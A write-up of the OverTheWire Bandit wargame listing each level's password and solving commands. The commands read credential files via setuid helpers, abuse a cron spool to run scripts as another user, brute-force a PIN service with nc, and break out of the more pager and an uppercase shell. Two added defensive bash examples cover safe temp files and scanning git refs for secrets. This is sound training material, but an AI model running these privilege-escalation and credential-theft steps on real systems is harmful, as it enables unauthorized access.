OverTheWire Bandit

1 Challenge link

https://overthewire.org/wargames/bandit/

2 Walkthrough

(0)

bandit.labs.overthewire.org, on port 2220

(1)

ssh bandit1@bandit.labs.overthewire.org -p 2220

boJ9jbbUNNfktd78OOpsqOltutMc3MY1

(2)

ssh bandit2@bandit.labs.overthewire.org -p 2220

CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
cat "spaces in this filename"
cat spaces\ in\ this\ filename

(3)

ssh bandit3@bandit.labs.overthewire.org -p 2220

UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK

(4)

ssh bandit4@bandit.labs.overthewire.org -p 2220

pIwrPrtPN36QITSp3EQaw936yaFoFgAB

bandit4@bandit:~/inhere$ file ./-file*
./-file00: data
./-file01: data
./-file02: data
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data
bandit4@bandit:~/inhere$ cat ./-file07
koReBOKuIDDepwhWk7jZC0RTdopnAYKh

(5)

ssh bandit5@bandit.labs.overthewire.org -p 2220

koReBOKuIDDepwhWk7jZC0RTdopnAYKh

find ./ -type f -size 1033c

(6)

ssh bandit6@bandit.labs.overthewire.org -p 2220

DXjZPULLxYr17uwoI01bNLQbtFemEgo7

find ./ -size 33c -user bandit7 -group bandit6
cat ./var/lib/dpkg/info/bandit7.password

(7)

ssh bandit7@bandit.labs.overthewire.org -p 2220

HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs

grep -ri millionth

(8)

ssh bandit8@bandit.labs.overthewire.org -p 2220

cvX2JJa4CFALtqS87jk27qwqGhBM9plV

sort ./data.txt | uniq -u

(9)

ssh bandit9@bandit.labs.overthewire.org -p 2220

UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR

strings ./data.txt | grep ====

(10)

ssh bandit10@bandit.labs.overthewire.org -p 2220

truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk

bandit10@bandit:~$ base64 -d data.txt 
The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR

(11)

ssh bandit11@bandit.labs.overthewire.org -p 2220

IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR

bandit11@bandit:~$ cat data.txt | tr 'a-zA-Z' 'n-za-mN-ZA-M'
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu

(12)

ssh bandit12@bandit.labs.overthewire.org -p 2220

5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu

mkdir /tmp/bling
cp data.txt /tmp/bling
cd /tmp/bling
xxd -r data.txt data.bin
file data.bin
mv data.bin data.gz
gzip -d data.gz
file data
bzip2 -d data
file data.out
mv data.out data.gz
gzip -d data.gz
file data
tar -xvf data
file data5.bin
tar -xvf data5.bin
file data6.bin
bzip2 -d data6.bin
file data6.bin.out
tar -xvf data6.bin.out
file data8.bin
mv data8.bin data8.gz
gzip -d data8.gz
file data8
cat data8

(13)

ssh bandit13@bandit.labs.overthewire.org -p 2220

8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL

ssh bandit14@localhost -i sshkey.private
cat /etc/bandit_pass/bandit14

(14)

ssh bandit14@bandit.labs.overthewire.org -p 2220

4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e

bandit14@bandit:~$ nc localhost 30000
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr

(15)

ssh bandit15@bandit.labs.overthewire.org -p 2220

BfMYroe26WYalil77FoDi9qh59eK5xNr

bandit15@bandit:~$ openssl s_client -connect localhost:30001
CONNECTED(00000003)
depth=0 CN = localhost
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = localhost
verify return:1
---
Certificate chain
0 s:/CN=localhost
i:/CN=localhost
---
Server certificate
subject=/CN=localhost
issuer=/CN=localhost
---
No client certificate CA names sent
Peer signing digest: SHA512
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1019 bytes and written 269 bytes
Verification error: self signed certificate
---
New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384
Server public key is 1024 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
Protocol : TLSv1.2
Cipher : ECDHE-RSA-AES256-GCM-SHA384
Session-ID: 007E0D8A0128B2FF4D905508CF737C9AA328D4D7EC300F3670BF87BF48F448AB
Session-ID-ctx:
Master-Key: 0943896BA02534F6AD45C9F4FD218941160F569022FD88ADD3C91E5555A65B4E56FBAC7628F26A5703404039B9AF6C4D
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)

Start Time: 1589699552
Timeout : 7200 (sec)
Verify return code: 18 (self signed certificate)
Extended master secret: yes
---
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd

closed

(16)

ssh bandit16@bandit.labs.overthewire.org -p 2220

cluFn7wTiGryunymYOu4RcffSxQluehd

bandit16@bandit:~$ nmap -p 31000-32000 localhost

Starting Nmap 7.40 ( https://nmap.org ) at 2020-05-17 09:18 CEST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00028s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
31046/tcp open unknown
31518/tcp open unknown
31691/tcp open unknown
31790/tcp open unknown
31960/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
-------------------------------------------------------------------------------
bandit16@bandit:~$ nmap -sV -p 31000-32000 localhost

Starting Nmap 7.40 ( https://nmap.org ) at 2020-05-17 09:34 CEST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00025s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
31046/tcp open echo
31518/tcp open ssl/echo
31691/tcp open echo
31790/tcp open ssl/unknown
31960/tcp open echo
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.00 seconds
------------------------------------------------------------------------
bandit16@bandit:~$ mkdir /tmp/bling2/
bandit16@bandit:~$ echo "cluFn7wTiGryunymYOu4RcffSxQluehd" | openssl s_client -connect localhost:31790 -quiet 2>/dev/null | tail -n 28 > /tmp/bling2/ssh.private
-----------------------------------------------------------------------
ssh -i ssh.private bandit17@localhost
cat /etc/bandit_pass/bandit17

(17)

ssh bandit17@bandit.labs.overthewire.org -p 2220

xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn

bandit17@bandit:~$ diff passwords.old passwords.new
42c42
< w0Yfolrc5bwjS4qw5mq1nnQi6mF03bii
---
> kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd

(18)

ssh bandit18@bandit.labs.overthewire.org -p 2220

kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd

bling@bling:~$ ssh bandit18@bandit.labs.overthewire.org -p 2220 "cat readme"
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit18@bandit.labs.overthewire.org's password:
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

(19)

ssh bandit19@bandit.labs.overthewire.org -p 2220

IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j

(20)

ssh bandit20@bandit.labs.overthewire.org -p 2220

GbKksEFF4yrVs6il55v6gwY5aVje5f0j

In one terminal:
bandit20@bandit:~$ nc -l -p 2333 < /etc/bandit_pass/bandit20

In another terminal:
bandit20@bandit:~$ ./suconnect 2333
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password

The first terminal receives the following string:
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

Or do it with a single command:

sh -c "nc -l -p 2333 < /etc/bandit_pass/bandit20 &"; ./suconnect 2333
or
sh -c "echo 'GbKksEFF4yrVs6il55v6gwY5aVje5f0j' | nc -l -p 2333 &"; ./suconnect 2333

(21)

ssh bandit21@bandit.labs.overthewire.org -p 2220

gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

bandit21@bandit:~$ cd /etc/cron.d/
----------------------------------------------------------------------
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
----------------------------------------------------------------------
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
----------------------------------------------------------------------
bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

(22)

ssh bandit22@bandit.labs.overthewire.org -p 2220

Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

bandit22@bandit:~$ cd /etc/cron.d
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:/etc/cron.d$ /usr/bin/cronjob_bandit23.sh
Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3
bandit22@bandit:/etc/cron.d$ cat /tmp/8169b67bd894ddbb4412f91573b38db3
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
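That is the wrong result: the script ran as bandit22, so this is bandit22's own password. Compute the file name for bandit23 instead: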
bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
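
Levels 21 and 22 both work because the cron job copies the password into a file in /tmp that other users can read and whose name they can work out. The following is an added example, not code from the game server or from the original write-up: it reproduces the name derivation of cronjob_bandit23.sh and puts a hardened variant beside it. The function names and the scratch directory are assumptions, and the sample secret is constructed.

```bash
#!/usr/bin/env bash
# Added example: the temp-file pattern of cronjob_bandit23.sh next to a
# hardened variant. Function names and the scratch directory are assumptions.

# The cron script derives its output name from the account name alone:
#   mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
# so any local user can repeat the computation for any account.
predictable_target() {
    echo "I am user $1" | md5sum | cut -d ' ' -f 1
}

# Weak: fixed, computable name in a shared directory, created under the
# caller's umask (typically 022, i.e. readable by every local user).
weak_dump() {           # weak_dump <secret-file> <shared-dir> <user>
    local out
    out="$2/$(predictable_target "$3")"
    cat "$1" > "$out"
    echo "$out"
}

# Hardened: mktemp chooses an unguessable name, creates the file itself with
# owner-only permissions, and fails rather than reuse a file or symlink that
# another user planted. The consumer must be given the path some other way.
safe_dump() {           # safe_dump <secret-file> <private-dir>
    local out
    out=$(umask 077 && mktemp "$2/pass.XXXXXXXXXX") || return 1
    cat "$1" > "$out"
    echo "$out"
}

# Permission string of a file, e.g. "-rw-r--r--".
mode_of() { ls -ld -- "$1" | cut -c1-10; }

# Constructed demo: a fake password file in a scratch directory.
demo() {
    local d w s
    d=$(mktemp -d) || return 1
    echo "constructed-secret" > "$d/secret"
    w=$(umask 022; weak_dump "$d/secret" "$d" bandit23)
    s=$(safe_dump "$d/secret" "$d")
    echo "weak: $(basename "$w") $(mode_of "$w")"
    echo "safe: $(basename "$s") $(mode_of "$s")"
    rm -rf "$d"
}
demo
```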

(23)

ssh bandit23@bandit.labs.overthewire.org -p 2220

jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

bandit23@bandit:~$ cd /etc/cron.d
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

mkdir /tmp/bling3
chmod 777 /tmp/bling3
cd /tmp/bling3
vim test.sh
# contents of test.sh:
#!/bin/sh
cat /etc/bandit_pass/bandit24 > /tmp/bling3/result24
# end of test.sh
chmod 777 test.sh
cp test.sh /var/spool/bandit24/test.sh
# wait a while for the cron job to run
cat result24

(24)

ssh bandit24@bandit.labs.overthewire.org -p 2220

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

bandit24@bandit:/tmp/bling4$ vim test.py
--------------------
#!/usr/bin/env python
# Write one "<bandit24 password> <pin>" line for every 4-digit PIN (0000-9999).
with open('test.txt', 'w') as f:
    for i in range(10000):
        payload = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ" + " " + str(i).zfill(4) + '\n'
        f.write(payload)
--------------------
bandit24@bandit:/tmp/bling4$ python test.py
bandit24@bandit:/tmp/bling4$ nc localhost 30002 < /tmp/bling4/test.txt > /tmp/bling4/result.txt
bandit24@bandit:/tmp/bling4$ sort ./result.txt | uniq -u

Correct!
Exiting.
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

(25)

ssh bandit25@bandit.labs.overthewire.org -p 2220

uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Resize the terminal window so that it can show only 3 or 4 lines.
$ ssh -i bandit26.sshkey bandit26@localhost
Run these commands in the more pager:
v - enter editing mode
:r /etc/bandit_pass/bandit26

(26)

ssh bandit26@bandit.labs.overthewire.org -p 2220

5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z

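Resize the terminal window so that it can show only 3 or 4 lines.
Log in over ssh; when the more pager appears, press v to enter editing mode, then run the following two commands to get a shell: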
:set shell=/bin/sh
:shell
bandit26@bandit:~$ ls
bandit27-do text.txt
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea

(27)

ssh bandit27@bandit.labs.overthewire.org -p 2220

3ba3118a22e93127a4ed485be72ef5ea

bandit27@bandit:~$ mkdir /tmp/bling
bandit27@bandit:~$ cd /tmp/bling
bandit27@bandit:/tmp/bling$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit27/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit27-git@localhost's password:
remote: Counting objects: 3, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3/3), done.
bandit27@bandit:/tmp/bling$ ls
repo
bandit27@bandit:/tmp/bling$ cd repo
bandit27@bandit:/tmp/bling/repo$ ls
README
bandit27@bandit:/tmp/bling/repo$ cat README
The password to the next level is: 0ef186ac70e04ea33b4c1853d2526fa2

(28)

ssh bandit28@bandit.labs.overthewire.org -p 2220

0ef186ac70e04ea33b4c1853d2526fa2

After cloning the repo:
bandit28@bandit:/tmp/bling28/repo$ git log
commit edd935d60906b33f0619605abd1689808ccdd5ee
Author: Morla Porla <morla@overthewire.org>
Date: Thu May 7 20:14:49 2020 +0200

fix info leak

commit c086d11a00c0648d095d04c089786efef5e01264
Author: Morla Porla <morla@overthewire.org>
Date: Thu May 7 20:14:49 2020 +0200

add missing data

commit de2ebe2d5fd1598cd547f4d56247e053be3fdc38
Author: Ben Dover <noone@overthewire.org>
Date: Thu May 7 20:14:49 2020 +0200

initial commit of README.md

bandit28@bandit:/tmp/bling28/repo$ git reset --hard c086d11a00c0648d095d04c089786efef5e01264
HEAD is now at c086d11 add missing data
bandit28@bandit:/tmp/bling28/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: bbc96594b4e001778eee9975372716b2

(29)

ssh bandit29@bandit.labs.overthewire.org -p 2220

bbc96594b4e001778eee9975372716b2

After cloning the repo:
bandit29@bandit:/tmp/bling29/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/dev
remotes/origin/master
remotes/origin/sploits-dev
bandit29@bandit:/tmp/bling29/repo$ git checkout origin/dev
Previous HEAD position was 786d5be... add some silly exploit, just for shit and giggles
HEAD is now at bc83328... add data needed for development
bandit29@bandit:/tmp/bling29/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: 5b90576bedb2cc04c86a9e924ce42faf

(30)

ssh bandit30@bandit.labs.overthewire.org -p 2220

5b90576bedb2cc04c86a9e924ce42faf

bandit30@bandit:/tmp/bling30/repo$ cd .git
bandit30@bandit:/tmp/bling30/repo/.git$ cat *
cat: branches: Is a directory
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = ssh://bandit30-git@localhost/home/bandit30-git/repo
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
Unnamed repository; edit this file 'description' to name the repository.
ref: refs/heads/master
cat: hooks: Is a directory
(binary contents of the index file omitted)
cat: info: Is a directory
cat: logs: Is a directory
cat: objects: Is a directory
# pack-refs with: peeled fully-peeled
3aefa229469b7ba1cc08203e5d8fa299354c496b refs/remotes/origin/master
f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea refs/tags/secret
cat: refs: Is a directory
bandit30@bandit:/tmp/bling30/repo/.git$ ls -al
total 52
drwxr-sr-x 8 bandit30 root 4096 May 17 14:52 .
drwxr-sr-x 3 bandit30 root 4096 May 17 14:52 ..
drwxr-sr-x 2 bandit30 root 4096 May 17 14:52 branches
-rw-r--r-- 1 bandit30 root 276 May 17 14:52 config
-rw-r--r-- 1 bandit30 root 73 May 17 14:52 description
-rw-r--r-- 1 bandit30 root 23 May 17 14:52 HEAD
drwxr-sr-x 2 bandit30 root 4096 May 17 14:52 hooks
-rw-r--r-- 1 bandit30 root 137 May 17 14:52 index
drwxr-sr-x 2 bandit30 root 4096 May 17 14:52 info
drwxr-sr-x 3 bandit30 root 4096 May 17 14:52 logs
drwxr-sr-x 4 bandit30 root 4096 May 17 14:52 objects
-rw-r--r-- 1 bandit30 root 165 May 17 14:52 packed-refs
drwxr-sr-x 5 bandit30 root 4096 May 17 14:52 refs
bandit30@bandit:/tmp/bling30/repo/.git$ git show --name-only secret
47e603bb428404d265f59c42920d81e5
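
Levels 28 to 30 each recover a credential that the checked-out README.md no longer shows: from an earlier commit, from the origin/dev branch, and from the tag named secret. The following added example (not part of the original write-up or of the game) is a defender's check that searches every object reachable from any ref. The function names, the sample repository and the secrets in it are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example, not part of the game: search everything reachable from any
# ref for a secret, covering the three hiding places in levels 28-30
# (an older commit, a non-default branch, a tag pointing straight at a blob).

# scan_all_refs <repo> <extended-regex>
# Prints "<blob-id> <path>" for each matching blob. "rev-list --objects --all"
# walks local branches, remote-tracking branches and tags, and also lists
# blobs that a ref points to directly (those have no path).
scan_all_refs() {
    local repo="$1" pattern="$2" oid path
    git -C "$repo" rev-list --objects --all |
    while read -r oid path; do
        [ "$(git -C "$repo" cat-file -t "$oid")" = blob ] || continue
        if git -C "$repo" cat-file -p "$oid" | grep -Eq -e "$pattern"; then
            echo "$oid ${path:-(no path: referenced directly by a ref)}"
        fi
    done
}

# Constructed sample repository reproducing the three situations; all names
# and secrets here are made up. Runs in a subshell so cd/exports stay local.
make_sample_repo() (
    set -e
    export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.invalid
    export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.invalid
    git init -q "$1" && cd "$1"
    echo "password: <TBD>" > README.md
    git add README.md && git commit -q -m "initial commit of README.md"
    echo "password: CONSTRUCTED-history-secret" > README.md
    git commit -q -am "add missing data"
    echo "password: xxxxxxxxxx" > README.md
    git commit -q -am "fix info leak"      # the previous blob stays in history
    git checkout -q -b dev
    echo "password: CONSTRUCTED-branch-secret" > README.md
    git commit -q -am "add data needed for development"
    git checkout -q -                      # back to the default branch
    blob=$(echo "password: CONSTRUCTED-tag-secret" | git hash-object -w --stdin)
    git tag secret "$blob"
)

# Constructed demo: the checked-out tree looks clean, the full scan does not.
demo() {
    local repo
    repo=$(mktemp -d) || return 1
    make_sample_repo "$repo" || return 1
    if git -C "$repo" grep -Eq 'CONSTRUCTED-' HEAD; then
        echo "HEAD: match"
    else
        echo "HEAD: clean"
    fi
    echo "all refs:"
    scan_all_refs "$repo" 'CONSTRUCTED-'
    rm -rf "$repo"
}
demo
```

On a large repository, feed the object list to `git cat-file --batch` instead of starting one process per object.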

(31)

ssh bandit31@bandit.labs.overthewire.org -p 2220

47e603bb428404d265f59c42920d81e5

After cloning the repo locally:
bandit31@bandit:/tmp/bling31/repo$ ls -al
total 20
drwxr-sr-x 3 bandit31 root 4096 May 17 15:00 .
drwxr-sr-x 3 bandit31 root 4096 May 17 14:59 ..
drwxr-sr-x 8 bandit31 root 4096 May 17 15:00 .git
-rw-r--r-- 1 bandit31 root 6 May 17 15:00 .gitignore
-rw-r--r-- 1 bandit31 root 147 May 17 15:00 README.md
bandit31@bandit:/tmp/bling31/repo$ echo "May I come in?" > key.txt
bandit31@bandit:/tmp/bling31/repo$ git add -f key.txt
bandit31@bandit:/tmp/bling31/repo$ git status
On branch master
Your branch is up-to-date with 'origin/master'.
Changes to be committed:
(use "git reset HEAD <file>..." to unstage)

new file: key.txt

bandit31@bandit:/tmp/bling31/repo$ git commit -m "add"
[master 93d69fa] add
1 file changed, 1 insertion(+)
create mode 100644 key.txt
bandit31@bandit:/tmp/bling31/repo$ git push origin master
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit31-git@localhost's password:
Counting objects: 3, done.
Delta compression using up to 2 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 315 bytes | 0 bytes/s, done.
Total 3 (delta 0), reused 0 (delta 0)
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 56a9bf19c63d650ce78e6ec0354ee45e
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost/home/bandit31-git/repo
! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'

(32)

ssh bandit32@bandit.labs.overthewire.org -p 2220

56a9bf19c63d650ce78e6ec0354ee45e

>> $0
$ ls
uppershell
$ cat /etc/bandit_pass/bandit33
c9c3199ddf4121b10cf581a98d51caee

(33)

ssh bandit33@bandit.labs.overthewire.org -p 2220

c9c3199ddf4121b10cf581a98d51caee

This level has not been released yet.
